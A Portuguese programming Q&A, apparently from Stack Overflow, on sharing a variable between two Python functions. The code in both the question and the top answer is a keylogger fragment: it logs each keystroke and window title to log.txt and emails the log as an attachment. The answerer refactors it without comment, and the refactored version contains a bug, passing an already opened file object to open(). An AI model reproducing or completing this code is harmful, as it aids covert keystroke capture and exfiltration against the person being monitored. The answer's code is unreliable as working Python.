# Usar variável de uma função em outra função python

Tags: python, funções

Quero puxar o que tem na variável 'arquivo' na função 'function' e jogar no filename da função 'send_email', como posso fazer isso?

```
def function(event):
            arquivo = open('log.txt', 'a')
            global janela
            if event.WindowsName != janela:
                janela = event.WindowsName
                arquivo.write('\n'+janela+' - ' + str(event.Time) + '\n')
            arquivo.write(chr(event.Ascii))
            arquivo.close()

def send_email():
        body = 'Logs file uploaded successfully!'
        msg.attach(MIMEText(body,'plain'))
        filename=arquivo
        attachment = open(filename,'rb')
```

Comment: Pode tentar definindo a variável 'arquivo' como global: `global arquivo`.

Comment: Obrigado. Consegui aqui.

Comment: A resposta correta é: do jeito que está, você não deveria fazer isso. Se você está fechando o arquivo em `function`, por quê iria utilizá-lo em `send_email`?

Answer (score 6):

Evite utilizar variáveis globais sem necessidade. Isso só prejudica sua aplicação, principalmente quando for precisar dar manutenção, pois uma variável pode mudar de valor de forma mágica de uma linha para a outra porque uma função, em algum lugar do projeto, importou ela do escopo global e a alterou. Se muitas funções fazem isso, então provavelmente você ficará sem saber até qual foi a função que fez isso.

Como são duas funções extremamente simples, a melhor forma é importar para o escopo local da função através dos argumentos da função.

```
def function(event, janela):
    arquivo = open('log.txt', 'a')
    with open(arquivo, 'a') as stream:
        if event.WindowsName != janela:
            janela = event.WindowsName
            stream.write('\n'+janela+' - ' + str(event.Time) + '\n')
        stream.write(chr(event.Ascii))
    return janela

def send_email(arquivo, msg):
    body = 'Logs file uploaded successfully!'
    msg.attach(MIMEText(body,'plain'))
    attachment = open(arquivo, 'rb')
```

Na função `send_email` ainda há esse objeto `msg` que apareceu magicamente no seu código, então inclui como argumento também. Aliás, quando você começa a depender muito de precisar alterar o escopo global em funções, claramente é um indício que você precisa criar uma classe para atuar como este escopo e reter o estado que você deseja entre chamadas das funções.

Mas a priori, considere que cada vez que você utiliza uma variável global um panda morre na China - e todos gostamos de pandas (Firefox não é tão utilizado a toa). Faça isso pelo menos até ter plena noção do que está fazendo e realmente entender a necessidade.